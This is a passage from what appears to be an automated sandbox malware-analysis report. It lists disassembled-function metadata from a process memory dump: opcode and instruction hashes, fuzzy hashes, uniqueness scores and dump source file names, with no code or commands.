                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c73884664ec6463b3ef8ba4e0c781f3417535d3b4587aef21b1cb5b9e685f8d4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 69b98fa6901daddf09c871cdef38192dbadff4755d8aa1d33fdeca8259ad830f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c73884664ec6463b3ef8ba4e0c781f3417535d3b4587aef21b1cb5b9e685f8d4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC81E273A2C78186EB74CF19D44037A7BA1FB96794F109235DA8D83B85EE3EE4019B05
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3bf38bb552e652050a5a4325e5c4404943d37f9760ac8566a9e89c8f0e7421a3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cc63ab8fdb5941df8972b7c6d280d905a4560e04cd19cbeae94cff4c10ae1403
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bf38bb552e652050a5a4325e5c4404943d37f9760ac8566a9e89c8f0e7421a3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A661F8A3E1829246FB248B28C44037A7692AF43371F546235D65EC66D1EE6FE801A706
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 152cb986df257354c7d3fc5c8f481290656e333240a4d17bca16192a5f48417e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9513C77E1865186E7248A29C0403AC37A0EB46B58F24A135CE8D97795EF3BEC43E749
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 73dcb32b888539e0e10e93c59c61f34da08da4a62bdc2a0049893b790e07ba6b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9518977E1865186E7648B29C04037837A0EB46B58F289131CE8D97794EF3BF853DB85
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1ce9f9fc8aa4f25e52cd432da428e4080c6de336cd4b10cf62aa236ceaba843c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50515E77F1869186E7248B29C04432837A1EB4AB68F24A131CA8D97794EF3BF843D745
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9249c42ac95197ff29d8432c2fa1e7414e2ad10f8ad2208d53d8cb897a1dc2af
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17515F37E1865186E7248B29C0403AD37A1EB46B58F24A131CE4D97795EF3BEC43E749
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5e6353a8e1c00b4c78eeb8b4a6b3e361d58be1ac9461154ef5fe49531964fa2b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48512977E1865186E7648B29C08032C37A1EB46B58F24A131CA4DD7798EF2BF853E745
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4036e5745e9e0566a74b9f50589acffe7f31c6b51e48e4593d58fd09c01dc177
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC517C37E1865186E7348B29C0403AC37A0EB46B58F24A131CA4C97799EF3BEC53E745
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bfcf1789381c84993ce595949dcdacc3d1578bff40d1a82bffc237ee3ecdee25
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A441E5E7819E8A04EB51891809047BA77809F17BA0D58F2B4CE9D937C3FC0F2987E10B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 588628887-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3055bbfcbd61cc8eecc56a6f1cb99aabc05f55128e1d14a3269b82b5b7201aa7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c63cc3a105a4c273b02228e37ff6ff8cf27d265cd6ef47b367c6375788c3969c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3055bbfcbd61cc8eecc56a6f1cb99aabc05f55128e1d14a3269b82b5b7201aa7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67412563B24A5882EF14CF6AD92426973A1BB49FD0B09E036DE4DC7B54EE3DC0829304
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 661748548992a33f3a500b93372cab8c74f62ef7f3472380e8fefb9c58a103fd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9a30a058f2b31f2dc705441fd535093f4737492140afe5384d91cf0e93aba755
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 661748548992a33f3a500b93372cab8c74f62ef7f3472380e8fefb9c58a103fd
